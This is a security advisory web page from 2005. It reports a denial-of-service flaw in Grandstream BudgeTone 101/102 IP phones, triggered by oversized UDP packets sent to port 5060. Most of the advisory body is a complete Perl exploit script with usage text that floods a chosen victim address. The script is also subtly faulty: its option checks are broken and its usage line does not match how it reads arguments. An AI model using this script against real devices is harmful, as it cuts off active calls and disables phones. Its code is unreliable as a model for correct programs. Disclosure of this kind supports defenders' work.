Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Grandstream Budge Tone 101/102 VoIP DoS 14 Aug. 2005    Summary Grandstream IP Phone is - "An award-winning next generation IP network telephone based on industry open standards." It is possible to initiate a denial of service attack against Grandstream phones, this by sending a UDP packet larger than 65534 bytes to port 5060.   Credit: The information has been provided by Pierre Kroma. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Devices:  * Grandstream Budge Tone-101  * Grandstream Budge Tone-102 Vulnerable Firmware:  * Firmware 3D version 1.0.6.7 (previous versions suspected) If you send an UDP packet larger than 65534 bytes to port 5060 the devices stop working.  * Any active telephone call will be aborted.  * The display will show nothing / display freeze.  * The integrated HTTP-server won't be reachable any more. To solve the problem, you must switch the phone off and on again. If you send a packet of exactly 65534 bytes the device may reboot. Smaller packets have no effect. Exploit: #!/usr/bin/perl # use IO::Socket; use Term::ANSIColor; ############## U S A G E ################## system ("clear"); print "\nGrandstream BT101/BT102 DoS\n"; print "written by pierre kroma (kroma\@syss.de)\n\n"; if (!$ARGV[2]){ print qq~ Usage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}  <ip-addr> = ;-)  <udp-port> = 5060  -r = 'reboot' the Grandstream BT 101/102  -s = 'shutdown' the Grandstream BT 101/102 ~; exit;} ################# D E F I N I T I O N S########## $victim = $ARGV[0]; $port = $ARGV[1]; $option = $ARGV[2]; if ( $option == 'r' || $option == 'R' ) { $request= 'k'x65534;} if ( $option == 's' || $option == 'S' ) { $request= 'p'x65535;} else { print "Wrong parameter - try it again";  exit; } # ping the remote device print color 'bold blue'; print "\nping the remote device $victim\n"; print color 'reset'; system("ping -c 3 $victim"); print color 'bold red'; print "\n Wait ... \n\n\n"; print color 'reset'; $sox = IO::Socket::INET->new(Proto=>"udp",PeerPort=>"$port",PeerAddr=>"$victim"); print $sox $request; sleep 1; close $sox; # ping the remote device print color 'bold blue'; print "ping the remote device $victim again\n"; print color 'reset'; system("ping -c 3 $victim");  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles HP Data Protector LogBackupLocationStatus SQL Injection Vulnerabilty InduSoft WebStudio Unauthenticated Operations Code Execution Vulnerabilityy InduSoft WebStudio CEServer Operation 0x15 Code Execution Vulnerability HP Data Protector Notebook Extension RequestCopy SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty HP Data Protector Notebook Extension GetPolicies SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability HP Data Protector Notebook Extension LogClientHealth SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogCopyOperation SQL Injection Vulnerabilty HP Data Protector Notebook Extension FinishedCopy SQL Injection Vulnerabilty Novell ZENWorks Software Packaging ISGrid.Grid2.1 Text Parameter Code Execution Vulnerabilit Adobe Reader BMP Image RLE Decoding Code Execution Vulnerability Apple QuickTime H264 Matrix Conversion Code Execution Vulnerability Apple QuickTime FLC Delta Decompression Code Execution Vulnerability Apple Quicktime PnPixPat PatType 3 Parsing Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®